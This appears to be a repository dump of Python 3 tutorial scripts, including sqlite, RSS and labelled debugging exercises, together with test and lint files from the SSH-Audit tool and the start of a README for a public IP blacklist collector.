sqlite3.Row 30 | print('Create table test') 31 | db.execute('drop table if exists test') 32 | db.execute('create table test ( t1 text, i1 int )') 33 | 34 | print('Create rows') 35 | insert(db, dict(t1 = 'one', i1 = 1)) 36 | insert(db, dict(t1 = 'two', i1 = 2)) 37 | insert(db, dict(t1 = 'three', i1 = 3)) 38 | insert(db, dict(t1 = 'four', i1 = 4)) 39 | disp_rows(db) 40 | 41 | print('Retrieve rows') 42 | print(dict(retrieve(db, 'one')), dict(retrieve(db, 'two'))) 43 | 44 | print('Update rows') 45 | update(db, dict(t1 = 'one', i1 = 101)) 46 | update(db, dict(t1 = 'three', i1 = 103)) 47 | disp_rows(db) 48 | 49 | print('Delete rows') 50 | delete(db, 'one') 51 | delete(db, 'three') 52 | disp_rows(db) 53 | 54 | if __name__ == "__main__": main() 55 | -------------------------------------------------------------------------------- /Python_3_Tutorials/17 Modules/modules.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sys 5 | 6 | def main(): 7 | print('Python version {}.{}.{}'.format(*sys.version_info)) 8 | 9 | if __name__ == "__main__": main() 10 | -------------------------------------------------------------------------------- /Python_3_Tutorials/17 Modules/saytime.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Python_3_Tutorials/17 Modules/saytime.pyc -------------------------------------------------------------------------------- /Python_3_Tutorials/17 Modules/web-saytime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import time, saytime 5 | 6 | t = time.localtime() 7 | print("Content-type: text/html\n") 8 | print( 9 | "In Phoenix, Arizona, it is now " + 10 | saytime.saytime_t(t).words() + 11 | time.strftime(', on %A, %d %B %Y.') 12 | ) 13 | 14 | 15 | -------------------------------------------------------------------------------- /Python_3_Tutorials/18 Debugging/incrange-errors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | class inclusive_range: 5 | def __init__(self, *args): 6 | numargs = len(args) 7 | if numargs < 1: raise TypeError('Requires at least one argument') 8 | elif numargs == 1: 9 | self.start = 0 10 | self.stop = args[0] 11 | self.step = 1 12 | elif numargs == 2: 13 | (self.start, self.stop) = args 14 | step = 1 15 | elif numargs == 3: 16 | (self.step, self.stop, self.start) = args 17 | else: raise TypeError('inclusiveRange expected at most 3 arguments, got {}'.format(numargs)) 18 | 19 | def __iter__(self): 20 | i = self.start 21 | while i >= self.stop: 22 | yield i 23 | i += self.step 24 | 25 | def main(): 26 | o = inclusive_range(4, 25, 3) 27 | for i in o: print(i, end = ' ') 28 | 29 | if __name__ == "__main__": main() 30 | -------------------------------------------------------------------------------- /Python_3_Tutorials/18 Debugging/mvc-errors.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | # -- CONTROLLER -- 5 | 6 | class AnimalActions: 7 | def bark(self): return self._doAction('bark') 8 | def fur(self): return self._doAction('fur') 9 | def quack(self): return self._doAction('quack') 10 | def feathers(self): return self._doAction('feathers') 11 | 12 | def _doAction(self, action): 13 | if action in self.strings: 14 | return self.strings[action] 15 | else: 16 | return 'The {} has no {}'.format(self.animalName(), action) 17 | 18 | def animalName(self): 19 | return self.__class__.__name__.lower() 20 | 21 | # -- MODEL -- 22 | 23 | class Duck(AnimalActions): 24 | strings = dict( 25 | quack = "Quaaaaak!", 26 | faethers = "The duck has gray and white feathers." 27 | ) 28 | 29 | class Person(AnimalActions): 30 | strings = dict( 31 | bark = "The person says woof!", 32 | fur = "The person puts on a fur coat.", 33 | quack = "The person imitates a duck.", 34 | feathers = "The person takes a feather from the ground and shows it." 35 | ) 36 | 37 | class Dog(AnimalActions): 38 | strings = dict( 39 | bark = "Arf!", 40 | fur = "The dog has white fur with black spots.", 41 | ) 42 | 43 | # -- VIEW -- 44 | 45 | def in_the_doghouse(dog): 46 | print(dog.bark()) 47 | print(dog.fur()) 48 | 49 | def in_the_forest(duck): 50 | print(duck.quack()) 51 | print(duck.feathers) 52 | 53 | def main(): 54 | donald = Duck() 55 | john = Person() 56 | fido = Dog() 57 | 58 | print("-- In the forest:") 59 | for o in ( donald, john, fido ): 60 | in_the_forest(o) 61 | 62 | print("-- In the doghouse:") 63 | for o in ( donald, john, fido ): 64 | in_the_doghouse(o) 65 | 66 | if __name__ == "__main__": main() 67 | -------------------------------------------------------------------------------- /Python_3_Tutorials/18 Debugging/test-saytime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import saytime 5 | import unittest 6 | 7 | class TestSaytime(unittest.TestCase): 8 | def setUp(self): 9 | self.nums = list(range(11)) 10 | 11 | def test_numbers(self): 12 | # make sure the numbers translate correctly 13 | words = ( 14 | 'oh', 'one', 'two', 'three', 'four', 'five', 15 | 'six', 'seven', 'eight', 'nine', 'ten' 16 | ) 17 | for i, n in enumerate(self.nums): 18 | self.assertEqual(saytime.numwords(n).numwords(), words[i]) 19 | 20 | def test_time(self): 21 | time_tuples = ( 22 | (0, 0), (0, 1), (11, 0), (12, 0), (13, 0), (12, 29), (12, 30), 23 | (12, 31), (12, 15), (12, 30), (12, 45), (11, 59), (23, 15), 24 | (23, 59), (12, 59), (13, 59), (1, 60), (24, 0) 25 | ) 26 | time_words = ( 27 | "midnight", 28 | "one past midnight", 29 | "eleven o'clock", 30 | "noon", 31 | "one o'clock", 32 | "twenty-nine past noon", 33 | "half past noon", 34 | "twenty-nine til one", 35 | "quarter past noon", 36 | "half past noon", 37 | "quarter til one", 38 | "one til noon", 39 | "quarter past eleven", 40 | "one til midnight", 41 | "one til one", 42 | "one til two", 43 | "OOR", 44 | "OOR" 45 | ) 46 | for i, t in enumerate(time_tuples): 47 | self.assertEqual(saytime.saytime(*t).words(), time_words[i]) 48 | 49 | if __name__ == "__main__": unittest.main() 50 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rss.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Python_3_Tutorials/19 Projects/Extras/RSS/rss.db -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | from xml.dom.minidom import parse 5 | from urllib.request import urlopen 6 | from html.parser import HTMLParser 7 | 8 | DEFAULT_NAMESPACES = ( 9 | None, # RSS 09.1, 0.92, 0.93, 0.94, 2.0 10 | 'http://purl.org/rss/1.0/', # RSS 1.0 11 | 'http://my.netscape.com/rdf/simple/0.9/', # RSS 0.90 12 | 'http://www.w3.org/2005/Atom', # ATOM 13 | 'http://purl.org/dc/elements/1.1/' # dublin core namespace 14 | ) 15 | 16 | class HTMLDataOnly(HTMLParser): 17 | ''' only gets data (text) from HTML -- no tags! ''' 18 | def handle_data(self, data): 19 | self._data = ' '.join([self._data, data]) if hasattr(self, 'data') else data 20 | def get_data(self): 21 | return self._data 22 | 23 | class RSS: 24 | def __init__(self, url): 25 | self.feed = parse(urlopen(url)) 26 | 27 | # rss or atom? 28 | for t in ('item', 'entry'): 29 | self.node = self.getElementsByTagName(self.feed, t) 30 | if self.node: break 31 | 32 | self.feedTitle = self.textOf(self.first(self.feed, 'title')) 33 | self.feedDescription = self.textOf(self.first(self.feed, 'description')) 34 | self.feedURL = url 35 | self._index = 0; 36 | 37 | def next_index(self, i = None): 38 | print("next_index", self._index) 39 | if i is None: self._index += 1 40 | elif i < 0: self._index = None 41 | else: self._index = i 42 | if self._index >= len(self.node): self._index = None 43 | return self._index 44 | 45 | def title(self, n = None): 46 | return self.textOfNode('title', n).strip() 47 | 48 | # atom uses an href attribute for the link 49 | def link(self, n = None): 50 | if n is None: n = self.node[self._index] 51 | l = self.textOfNode('link', n).strip() 52 | return l if l else self.attrOf(n, 'link', 'href').strip() 53 | 54 | def description(self, n = None): 55 | htmldata = HTMLDataOnly() 56 | for t in ('description', 'summary'): 57 | text = self.textOfNode(t, n) 58 | if text: 59 | htmldata.feed(text) 60 | return htmldata.get_data().strip() 61 | return '' 62 | 63 | def date(self): 64 | for t in ('date', 'pubDate'): 65 | s = self.textOfNode(t) 66 | if s: return s 67 | 68 | def getElementsByTagName(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES): 69 | for namespace in possibleNamespaces: 70 | children = node.getElementsByTagNameNS(namespace, tagName) 71 | if len(children): return children 72 | return [] 73 | 74 | def first(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES): 75 | children = self.getElementsByTagName(node, tagName, possibleNamespaces) 76 | return children[0] if len(children) else None 77 | 78 | def attrOf(self, node, element, attr): 79 | n = self.first(node, element) 80 | return n.getAttribute(attr) if n else '' 81 | 82 | def textOf(self, node): 83 | return ''.join([child.data for child in node.childNodes]) if node else '' 84 | 85 | def textOfNode(self, tagName, n = None): 86 | if n is None: n = self.node[self._index] 87 | return self.textOf(self.first(n, tagName)) 88 | 89 | def record(self, n): 90 | return { 91 | 'title': self.title(n), 92 | 'link': self.link(n), 93 | 'description': self.description(n), 94 | 'index': self.node.index(n) 95 | } 96 | 97 | def records(self): 98 | for n in self.node: 99 | yield self.record(n) 100 | 101 | def main(): 102 | for url in ( 103 | 'http://feeds.nytimes.com/nyt/rss/Books', 104 | 'http://billweinman.wordpress.com/feed/', 105 | 'http://perlhacks.com/atom.xml' 106 | ): 107 | rss = RSS(url) 108 | for r in rss.records(): 109 | print("node {} of {}".format(r['index'] + 1, len(rss.node))) 110 | print(r['title']) 111 | print(r['link']) 112 | print(r['description']) 113 | 114 | if __name__ == "__main__": main() 115 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rss.py~: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | from xml.dom.minidom import parse 5 | from urllib.request import urlopen 6 | from html.parser import HTMLParser 7 | 8 | DEFAULT_NAMESPACES = ( 9 | None, # RSS 09.1, 0.92, 0.93, 0.94, 2.0 10 | 'http://purl.org/rss/1.0/', # RSS 1.0 11 | 'http://my.netscape.com/rdf/simple/0.9/', # RSS 0.90 12 | 'http://www.w3.org/2005/Atom', # ATOM 13 | 'http://purl.org/dc/elements/1.1/' # dublin core namespace 14 | ) 15 | 16 | class HTMLDataOnly(HTMLParser): 17 | ''' only gets data (text) from HTML -- no tags! ''' 18 | def handle_data(self, data): 19 | self._data = ' '.join([self._data, data]) if hasattr(self, 'data') else data 20 | def get_data(self): 21 | return self._data 22 | 23 | class RSS: 24 | def __init__(self, url): 25 | self.feed = parse(urlopen(url)) 26 | 27 | # rss or atom? 28 | for t in ('item', 'entry'): 29 | self.node = self.getElementsByTagName(self.feed, t) 30 | if self.node: break 31 | 32 | self.feedTitle = self.textOf(self.first(self.feed, 'title')) 33 | self.feedDescription = self.textOf(self.first(self.feed, 'description')) 34 | self.feedURL = url 35 | self._index = 0; 36 | 37 | def next_index(self, i = None): 38 | print("next_index", self._index) 39 | if i is None: self._index += 1 40 | elif i < 0: self._index = None 41 | else: self._index = i 42 | if self._index >= len(self.node): self._index = None 43 | return self._index 44 | 45 | def title(self, n = None): 46 | return self.textOfNode('title', n).strip() 47 | 48 | # atom uses an href attribute for the link 49 | def link(self, n = None): 50 | if n is None: n = self.node[self._index] 51 | l = self.textOfNode('link', n).strip() 52 | return l if l else self.attrOf(n, 'link', 'href').strip() 53 | 54 | def description(self, n = None): 55 | htmldata = HTMLDataOnly() 56 | for t in ('description', 'summary'): 57 | text = self.textOfNode(t, n) 58 | if text: 59 | htmldata.feed(text) 60 | return htmldata.get_data().strip() 61 | return '' 62 | 63 | def date(self): 64 | for t in ('date', 'pubDate'): 65 | s = self.textOfNode(t) 66 | if s: return s 67 | 68 | def getElementsByTagName(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES): 69 | for namespace in possibleNamespaces: 70 | children = node.getElementsByTagNameNS(namespace, tagName) 71 | if len(children): return children 72 | return [] 73 | 74 | def first(self, node, tagName, possibleNamespaces=DEFAULT_NAMESPACES): 75 | children = self.getElementsByTagName(node, tagName, possibleNamespaces) 76 | return children[0] if len(children) else None 77 | 78 | def attrOf(self, node, element, attr): 79 | n = self.first(node, element) 80 | return n.getAttribute(attr) if n else '' 81 | 82 | def textOf(self, node): 83 | return ''.join([child.data for child in node.childNodes]) if node else '' 84 | 85 | def textOfNode(self, tagName, n = None): 86 | if n is None: n = self.node[self._index] 87 | return self.textOf(self.first(n, tagName)) 88 | 89 | def record(self, n): 90 | return { 91 | 'title': self.title(n), 92 | 'link': self.link(n), 93 | 'description': self.description(n), 94 | 'index': self.node.index(n) 95 | } 96 | 97 | def records(self): 98 | for n in self.node: 99 | yield self.record(n) 100 | 101 | def main(): 102 | for url in ( 103 | 'http://feeds.nytimes.com/nyt/rss/Books', 104 | 'http://billweinman.wordpress.com/feed/', 105 | 'http://perlhacks.com/atom.xml' 106 | ): 107 | rss = RSS(url) 108 | for r in rss.records(): 109 | print("node {} of {}".format(r['index'] + 1, len(rss.node))) 110 | print(r['title']) 111 | print(r['link']) 112 | print(r['description']) 113 | 114 | if __name__ == "__main__": main() 115 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rssdb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | __author__ = "Santhosh Baswa" 3 | 4 | import sqlite3 5 | 6 | _DBFILE = 'rss.db' 7 | 8 | class rssDB: 9 | def __init__(self): 10 | self._db = sqlite3.connect(_DBFILE) 11 | self._db.row_factory = sqlite3.Row 12 | self._db.execute(''' 13 | CREATE TABLE IF NOT EXISTS feed ( 14 | id INTEGER PRIMARY KEY, 15 | url TEXT UNIQUE, 16 | title TEXT, 17 | description TEXT 18 | ) 19 | ''') 20 | 21 | def insert(self, rec): 22 | self._db.execute(''' 23 | INSERT into feed (url, title, description) 24 | VALUES (:url, :title, :description) 25 | ''', rec) 26 | self._db.commit() 27 | 28 | def getByURL(self, url): 29 | c = self._db.cursor() 30 | c.execute('SELECT * FROM feed WHERE url = ?', (url,)) 31 | return c.fetchone() 32 | 33 | def getById(self, id): 34 | c = self._db.cursor() 35 | c.execute('SELECT * FROM feed WHERE id = ?', (id,)) 36 | return c.fetchone() 37 | 38 | def update(self, rec): 39 | self._db.execute(''' 40 | UPDATE feed 41 | SET title = :title, description = :description 42 | WHERE url = :url 43 | ''', rec ) 44 | self._db.commit() 45 | 46 | def delById(self, id): 47 | self._db.execute('DELETE from feed WHERE id = ?', (id,)) 48 | self._db.commit() 49 | 50 | def list(self): 51 | c = self._db.cursor() 52 | c.execute('SELECT * FROM feed ORDER BY UPPER(title)') 53 | for r in c: 54 | yield r; 55 | 56 | def main(): 57 | db = rssDB() 58 | print('all recs from {}:'.format(_DBFILE)) 59 | for r in db.list(): 60 | print('{title} [{url}] {description}'.format(**r)) 61 | 62 | if __name__=='__main__': main() 63 | -------------------------------------------------------------------------------- /Python_3_Tutorials/19 Projects/Extras/RSS/rssdb.py~: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # template.py by Bill Weinman [http://bw.org/] 3 | # created for Python 3 Essential Training on lynda.com 4 | # Copyright 2010 The BearHeart Gorup, LLC 5 | import sqlite3 6 | 7 | _DBFILE = 'rss.db' 8 | 9 | class rssDB: 10 | def __init__(self): 11 | self._db = sqlite3.connect(_DBFILE) 12 | self._db.row_factory = sqlite3.Row 13 | self._db.execute(''' 14 | CREATE TABLE IF NOT EXISTS feed ( 15 | id INTEGER PRIMARY KEY, 16 | url TEXT UNIQUE, 17 | title TEXT, 18 | description TEXT 19 | ) 20 | ''') 21 | 22 | def insert(self, rec): 23 | self._db.execute(''' 24 | INSERT into feed (url, title, description) 25 | VALUES (:url, :title, :description) 26 | ''', rec) 27 | self._db.commit() 28 | 29 | def getByURL(self, url): 30 | c = self._db.cursor() 31 | c.execute('SELECT * FROM feed WHERE url = ?', (url,)) 32 | return c.fetchone() 33 | 34 | def getById(self, id): 35 | c = self._db.cursor() 36 | c.execute('SELECT * FROM feed WHERE id = ?', (id,)) 37 | return c.fetchone() 38 | 39 | def update(self, rec): 40 | self._db.execute(''' 41 | UPDATE feed 42 | SET title = :title, description = :description 43 | WHERE url = :url 44 | ''', rec ) 45 | self._db.commit() 46 | 47 | def delById(self, id): 48 | self._db.execute('DELETE from feed WHERE id = ?', (id,)) 49 | self._db.commit() 50 | 51 | def list(self): 52 | c = self._db.cursor() 53 | c.execute('SELECT * FROM feed ORDER BY UPPER(title)') 54 | for r in c: 55 | yield r; 56 | 57 | def main(): 58 | db = rssDB() 59 | print('all recs from {}:'.format(_DBFILE)) 60 | for r in db.list(): 61 | print('{title} [{url}] {description}'.format(**r)) 62 | 63 | if __name__=='__main__': main() 64 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My-Dirty-Scripts 2 | # My-Dirty-Scripts 3 | # My_Dirty_Scripts 4 | -------------------------------------------------------------------------------- /SSH-Audit/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (C) 2016 Andris Raugulis (moo@arthepsy.eu) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /SSH-Audit/test/conftest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import io 5 | import sys 6 | import socket 7 | import pytest 8 | 9 | 10 | if sys.version_info[0] == 2: 11 | import StringIO # pylint: disable=import-error 12 | StringIO = StringIO.StringIO 13 | else: 14 | StringIO = io.StringIO 15 | 16 | 17 | @pytest.fixture(scope='module') 18 | def ssh_audit(): 19 | __rdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..') 20 | sys.path.append(os.path.abspath(__rdir)) 21 | return __import__('ssh-audit') 22 | 23 | 24 | # pylint: disable=attribute-defined-outside-init 25 | class _OutputSpy(list): 26 | def begin(self): 27 | self.__out = StringIO() 28 | self.__old_stdout = sys.stdout 29 | sys.stdout = self.__out 30 | 31 | def flush(self): 32 | lines = self.__out.getvalue().splitlines() 33 | sys.stdout = self.__old_stdout 34 | self.__out = None 35 | return lines 36 | 37 | 38 | @pytest.fixture(scope='module') 39 | def output_spy(): 40 | return _OutputSpy() 41 | 42 | 43 | class _VirtualSocket(object): 44 | def __init__(self): 45 | self.sock_address = ('127.0.0.1', 0) 46 | self.peer_address = None 47 | self._connected = False 48 | self.timeout = -1.0 49 | self.rdata = [] 50 | self.sdata = [] 51 | self.errors = {} 52 | 53 | def _check_err(self, method): 54 | method_error = self.errors.get(method) 55 | if method_error: 56 | raise method_error 57 | 58 | def connect(self, address): 59 | return self._connect(address, False) 60 | 61 | def _connect(self, address, ret=True): 62 | self.peer_address = address 63 | self._connected = True 64 | self._check_err('connect') 65 | return self if ret else None 66 | 67 | def settimeout(self, timeout): 68 | self.timeout = timeout 69 | 70 | def gettimeout(self): 71 | return self.timeout 72 | 73 | def getpeername(self): 74 | if self.peer_address is None or not self._connected: 75 | raise socket.error(57, 'Socket is not connected') 76 | return self.peer_address 77 | 78 | def getsockname(self): 79 | return self.sock_address 80 | 81 | def bind(self, address): 82 | self.sock_address = address 83 | 84 | def listen(self, backlog): 85 | pass 86 | 87 | def accept(self): 88 | # pylint: disable=protected-access 89 | conn = _VirtualSocket() 90 | conn.sock_address = self.sock_address 91 | conn.peer_address = ('127.0.0.1', 0) 92 | conn._connected = True 93 | return conn, conn.peer_address 94 | 95 | def recv(self, bufsize, flags=0): 96 | # pylint: disable=unused-argument 97 | if not self._connected: 98 | raise socket.error(54, 'Connection reset by peer') 99 | if not len(self.rdata) > 0: 100 | return b'' 101 | data = self.rdata.pop(0) 102 | if isinstance(data, Exception): 103 | raise data 104 | return data 105 | 106 | def send(self, data): 107 | if self.peer_address is None or not self._connected: 108 | raise socket.error(32, 'Broken pipe') 109 | self._check_err('send') 110 | self.sdata.append(data) 111 | 112 | 113 | @pytest.fixture() 114 | def virtual_socket(monkeypatch): 115 | vsocket = _VirtualSocket() 116 | 117 | # pylint: disable=unused-argument 118 | def _socket(family=socket.AF_INET, 119 | socktype=socket.SOCK_STREAM, 120 | proto=0, 121 | fileno=None): 122 | return vsocket 123 | 124 | def _cc(address, timeout=0, source_address=None): 125 | # pylint: disable=protected-access 126 | return vsocket._connect(address, True) 127 | 128 | monkeypatch.setattr(socket, 'create_connection', _cc) 129 | monkeypatch.setattr(socket, 'socket', _socket) 130 | return vsocket 131 | -------------------------------------------------------------------------------- /SSH-Audit/test/coverage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type py.test > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: py.test (Python testing framework) not found." 6 | exit 1 7 | fi 8 | cd -- "${_cdir}/.." 9 | mkdir -p html 10 | py.test -v --cov-report=html:html/coverage --cov=ssh-audit test 11 | -------------------------------------------------------------------------------- /SSH-Audit/test/mypy-py2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type mypy > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: mypy (Optional Static Typing for Python) not found." 6 | exit 1 7 | fi 8 | _htmldir="${_cdir}/../html/mypy-py2" 9 | mkdir -p "${_htmldir}" 10 | mypy --python-version 2.7 --config-file "${_cdir}/mypy.ini" --html-report "${_htmldir}" "${_cdir}/../ssh-audit.py" 11 | -------------------------------------------------------------------------------- /SSH-Audit/test/mypy-py3.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type mypy > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: mypy (Optional Static Typing for Python) not found." 6 | exit 1 7 | fi 8 | _htmldir="${_cdir}/../html/mypy-py3" 9 | mkdir -p "${_htmldir}" 10 | mypy --python-version 3.5 --config-file "${_cdir}/mypy.ini" --html-report "${_htmldir}" "${_cdir}/../ssh-audit.py" 11 | -------------------------------------------------------------------------------- /SSH-Audit/test/mypy.ini: -------------------------------------------------------------------------------- 1 | [mypy] 2 | silent_imports = True 3 | disallow_untyped_calls = True 4 | disallow_untyped_defs = True 5 | check_untyped_defs = True 6 | disallow-subclassing-any = True 7 | warn-incomplete-stub = True 8 | warn-redundant-casts = True 9 | 10 | -------------------------------------------------------------------------------- /SSH-Audit/test/prospector.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | _cdir=$(cd -- "$(dirname "$0")" && pwd) 3 | type prospector > /dev/null 2>&1 4 | if [ $? -ne 0 ]; then 5 | echo "err: prospector (Python Static Analysis) not found." 6 | exit 1 7 | fi 8 | if [ X"$1" == X"" ]; then 9 | _file="${_cdir}/../ssh-audit.py" 10 | else 11 | _file="$1" 12 | fi 13 | prospector -E --profile-path "${_cdir}" -P prospector "${_file}" 14 | -------------------------------------------------------------------------------- /SSH-Audit/test/prospector.yml: -------------------------------------------------------------------------------- 1 | strictness: veryhigh 2 | doc-warnings: false 3 | 4 | pylint: 5 | disable: 6 | - multiple-imports 7 | - invalid-name 8 | - trailing-whitespace 9 | 10 | options: 11 | max-args: 8 # default: 5 12 | max-locals: 20 # default: 15 13 | max-returns: 6 14 | max-branches: 15 # default: 12 15 | max-statements: 60 # default: 50 16 | max-parents: 7 17 | max-attributes: 8 # default: 7 18 | min-public-methods: 1 # default: 2 19 | max-public-methods: 20 20 | max-bool-expr: 5 21 | max-nested-blocks: 6 # default: 5 22 | max-line-length: 80 # default: 100 23 | ignore-long-lines: ^\s*(#\s+type:\s+.*|[A-Z0-9_]+\s+=\s+.*|('.*':\s+)?\[.*\],?)$ 24 | max-module-lines: 2500 # default: 10000 25 | 26 | pep8: 27 | disable: 28 | - W191 # indentation contains tabs 29 | - W293 # blank line contains whitespace 30 | - E101 # indentation contains mixed spaces and tabs 31 | - E401 # multiple imports on one line 32 | - E501 # line too long 33 | - E221 # multiple spaces before operator 34 | 35 | pyflakes: 36 | disable: 37 | - F401 # module imported but unused 38 | - F821 # undefined name 39 | 40 | mccabe: 41 | options: 42 | max-complexity: 15 43 | -------------------------------------------------------------------------------- /SSH-Audit/test/test_banner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import pytest 4 | 5 | 6 | # pylint: disable=line-too-long,attribute-defined-outside-init 7 | class TestBanner(object): 8 | @pytest.fixture(autouse=True) 9 | def init(self, ssh_audit): 10 | self.ssh = ssh_audit.SSH 11 | 12 | def test_simple_banners(self): 13 | banner = lambda x: self.ssh.Banner.parse(x) # noqa 14 | b = banner('SSH-2.0-OpenSSH_7.3') 15 | assert b.protocol == (2, 0) 16 | assert b.software == 'OpenSSH_7.3' 17 | assert b.comments is None 18 | assert str(b) == 'SSH-2.0-OpenSSH_7.3' 19 | b = banner('SSH-1.99-Sun_SSH_1.1.3') 20 | assert b.protocol == (1, 99) 21 | assert b.software == 'Sun_SSH_1.1.3' 22 | assert b.comments is None 23 | assert str(b) == 'SSH-1.99-Sun_SSH_1.1.3' 24 | b = banner('SSH-1.5-Cisco-1.25') 25 | assert b.protocol == (1, 5) 26 | assert b.software == 'Cisco-1.25' 27 | assert b.comments is None 28 | assert str(b) == 'SSH-1.5-Cisco-1.25' 29 | 30 | def test_invalid_banners(self): 31 | b = lambda x: self.ssh.Banner.parse(x) # noqa 32 | assert b('Something') is None 33 | assert b('SSH-XXX-OpenSSH_7.3') is None 34 | 35 | def test_banners_with_spaces(self): 36 | b = lambda x: self.ssh.Banner.parse(x) # noqa 37 | s = 'SSH-2.0-OpenSSH_4.3p2' 38 | assert str(b('SSH-2.0-OpenSSH_4.3p2 ')) == s 39 | assert str(b('SSH-2.0- OpenSSH_4.3p2')) == s 40 | assert str(b('SSH-2.0- OpenSSH_4.3p2 ')) == s 41 | s = 'SSH-2.0-OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu' 42 | assert str(b('SSH-2.0- OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu')) == s 43 | assert str(b('SSH-2.0-OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu ')) == s 44 | assert str(b('SSH-2.0- OpenSSH_4.3p2 Debian-9etch3 on i686-pc-linux-gnu ')) == s 45 | 46 | def test_banners_without_software(self): 47 | b = lambda x: self.ssh.Banner.parse(x) # noqa 48 | assert b('SSH-2.0').protocol == (2, 0) 49 | assert b('SSH-2.0').software is None 50 | assert b('SSH-2.0').comments is None 51 | assert str(b('SSH-2.0')) == 'SSH-2.0' 52 | assert b('SSH-2.0-').protocol == (2, 0) 53 | assert b('SSH-2.0-').software == '' 54 | assert b('SSH-2.0-').comments is None 55 | assert str(b('SSH-2.0-')) == 'SSH-2.0-' 56 | 57 | def test_banners_with_comments(self): 58 | b = lambda x: self.ssh.Banner.parse(x) # noqa 59 | assert repr(b('SSH-2.0-OpenSSH_7.2p2 Ubuntu-1')) == '' 60 | assert repr(b('SSH-1.99-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3')) == '' 61 | assert repr(b('SSH-1.5-1.3.7 F-SECURE SSH')) == '' 62 | 63 | def test_banners_with_multiple_protocols(self): 64 | b = lambda x: self.ssh.Banner.parse(x) # noqa 65 | assert str(b('SSH-1.99-SSH-1.99-OpenSSH_3.6.1p2')) == 'SSH-1.99-OpenSSH_3.6.1p2' 66 | assert str(b('SSH-2.0-SSH-2.0-OpenSSH_4.3p2 Debian-9')) == 'SSH-2.0-OpenSSH_4.3p2 Debian-9' 67 | assert str(b('SSH-1.99-SSH-2.0-dropbear_0.5')) == 'SSH-1.99-dropbear_0.5' 68 | assert str(b('SSH-2.0-SSH-1.99-OpenSSH_4.2p1 SSH Secure Shell (non-commercial)')) == 'SSH-1.99-OpenSSH_4.2p1 SSH Secure Shell (non-commercial)' 69 | assert str(b('SSH-1.99-SSH-1.99-SSH-1.99-OpenSSH_3.9p1')) == 'SSH-1.99-OpenSSH_3.9p1' 70 | -------------------------------------------------------------------------------- /Threat_Blacklisted_Collection/README.md: -------------------------------------------------------------------------------- 1 | # ThreatCollection-PublicSources 2 | 3 | ThreatCollection_Blacklisted_Small.py will create a list of about 30,000 de-duplicated bad actors from public IP blacklist for your infosec needs. 4 | 5 | ThreatCollection_Blacklisted_BigData.py will create a list of 